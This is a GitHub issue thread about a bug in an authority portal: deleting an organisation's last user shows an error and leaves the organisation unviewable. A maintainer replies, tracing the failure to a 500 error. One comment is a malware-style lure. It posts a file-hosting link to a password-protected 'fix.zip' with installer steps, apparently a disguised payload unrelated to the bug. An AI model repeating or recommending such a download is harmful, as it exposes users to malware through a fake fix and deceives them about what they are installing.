### ISSUE TITLE
Deleting the last user of an organisation shows faulty behaviour

### ISSUE THREAD

**Issue by tmberthold** [sovity/authority-portal#289]
### Description - What happened? *

If an organisation consists of only one user and an authority admin tries to delete this user, a message appears that the user could not be deleted but after that then the organisation can no longer be displayed in the UI when it is being clicked on after page refresh. 

### Expected Behavior *

Delete participant should work properly, a proper message should be displayed and the flow should be working depending on whether the deletion of the last user of an org is wanted or not, but under no circumstances this error message and faulty flow should be displayed. 

### Observed Behavior *

During my test, when I tried to delete the last user of an organisation, I first received an error message that the user could not be deleted and then the organisation could no longer be displayed. I now neither know whether the user has been deleted nor how to get back from this error state for the orga. 

### Steps to Reproduce

1. Log in as an authority admin.
2. Navigate to "Organizations".
3. Select any pending or active participants
4. Open Organization Details and go to User Overview for that company //with just 1 user in orga
5. Click on "Delete user" -> Delete user confirmation popup window is displayed
6. Click on delete button on confirmation popup window and error is displayed

### Screenshots

Org with only 1 user

![image](https://github.com/user-attachments/assets/b1f3e05f-5111-4c8a-b78d-4a8861292fc3)

after deleting the user when clicking the org after page refresh:

![image](https://github.com/user-attachments/assets/0493385e-267a-4539-b78b-f3ae91d262ff)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kamilczaja** [comment]
Cannot reproduce fully.
I agree that the organization detail slide over should close and the organization list should refresh to reflect the deleted organization but I cannot see any error banner saying that it failed to delete the user.

The 500 occurs because the portal tries to re-load the organization data of an organization that is already deleted

![Image](https://github.com/user-attachments/assets/79b7d1b8-9b7a-48b4-81aa-edf98e408e2e)
![Image](https://github.com/user-attachments/assets/9349b2d4-6f06-4bce-8485-7519239d271d)
